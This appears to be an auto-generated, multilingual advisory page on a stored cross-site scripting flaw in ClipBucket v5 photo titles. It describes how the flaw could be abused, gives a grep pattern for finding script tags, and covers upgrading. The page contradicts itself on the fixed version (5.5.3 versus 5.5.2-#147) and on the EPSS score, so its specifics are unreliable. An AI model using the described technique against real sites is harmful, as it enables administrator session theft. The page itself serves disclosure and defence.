Plattform
php
Komponente
clipbucket-v5
Behoben in
5.5.3
CVE-2025-64336 describes a stored Cross-Site Scripting (XSS) vulnerability affecting ClipBucket v5, an open-source video sharing platform. This vulnerability allows authenticated regular users to inject malicious code into photo titles, leading to potential JavaScript execution within the administrator's browser. Versions 5.5.2-#146 and earlier are affected, while a fix is available in version 5.5.2-#147.
The vulnerability lies within the Manage Photos feature of ClipBucket. An attacker, posing as an authenticated user, can upload a photo with a specially crafted title containing HTML or JavaScript code. While this payload doesn't immediately affect the public-facing video gallery or detail pages, it's rendered unsafely when an administrator views the Manage Photos section. This allows the attacker to execute arbitrary JavaScript code within the administrator's browser context. This could lead to session hijacking, credential theft, or defacement of the administrative interface, potentially granting the attacker control over the entire ClipBucket installation.
This vulnerability was publicly disclosed on 2025-11-07. No public proof-of-concept (PoC) code has been identified at the time of writing. It is not currently listed on the CISA KEV catalog. The EPSS score is pending evaluation, but given the potential for administrative access compromise, it warrants careful attention.
Organizations and individuals using ClipBucket v5 for video sharing, particularly those with administrative access to the platform, are at risk. Shared hosting environments where multiple users have access to the ClipBucket installation are especially vulnerable, as a compromised user could exploit this vulnerability to target other users or the hosting provider itself.
• php: Examine ClipBucket's database for photo titles containing suspicious HTML or JavaScript code. Use grep to search the photos table for patterns like <script> or onload=.
grep -i '<script' /var/www/clipbucket/db/photos.sql• generic web: Monitor access logs for requests to the Manage Photos section with unusual parameters or user agents. Look for POST requests to the photo upload endpoint with potentially malicious data. • generic web: Check the ClipBucket installation directory for any newly created files or modifications to existing files that could indicate an attacker has gained access.
disclosure
Exploit-Status
EPSS
0.06% (18% Perzentil)
CISA SSVC
The primary mitigation for CVE-2025-64336 is to immediately upgrade ClipBucket to version 5.5.2-#147 or later. If upgrading is not immediately feasible, consider implementing input validation and sanitization on the Photo Title field to prevent the injection of HTML or JavaScript code. Web Application Firewalls (WAFs) configured to detect and block XSS payloads can also provide a temporary layer of protection. Regularly review and audit user-uploaded content for suspicious activity.
Actualice ClipBucket a la versión 5.5.2-#147 o superior. Esta versión corrige la vulnerabilidad XSS almacenada en la función de gestión de fotos. La actualización evitará que usuarios autenticados inyecten código malicioso a través del título de las fotos, protegiendo así la sesión del administrador.
Schwachstellenanalysen und kritische Warnungen direkt in deinen Posteingang.
CVE-2025-64336 is a stored Cross-Site Scripting (XSS) vulnerability in ClipBucket v5, allowing authenticated users to inject malicious JavaScript into photo titles, potentially impacting the administrator's browser.
You are affected if you are using ClipBucket v5 versions 5.5.2-#146 or earlier. Upgrade to 5.5.2-#147 to mitigate the risk.
The recommended fix is to upgrade ClipBucket to version 5.5.2-#147 or later. As a temporary workaround, implement input validation and sanitization on the Photo Title field.
There is no confirmed active exploitation of CVE-2025-64336 at this time, but the vulnerability is publicly known and should be addressed promptly.
Refer to the ClipBucket security advisory for details and updates: [https://www.clipbucket.net/security/advisories/]
Lade deine Abhängigkeitsdatei hoch und erfahre sofort, ob dich diese und andere CVEs treffen.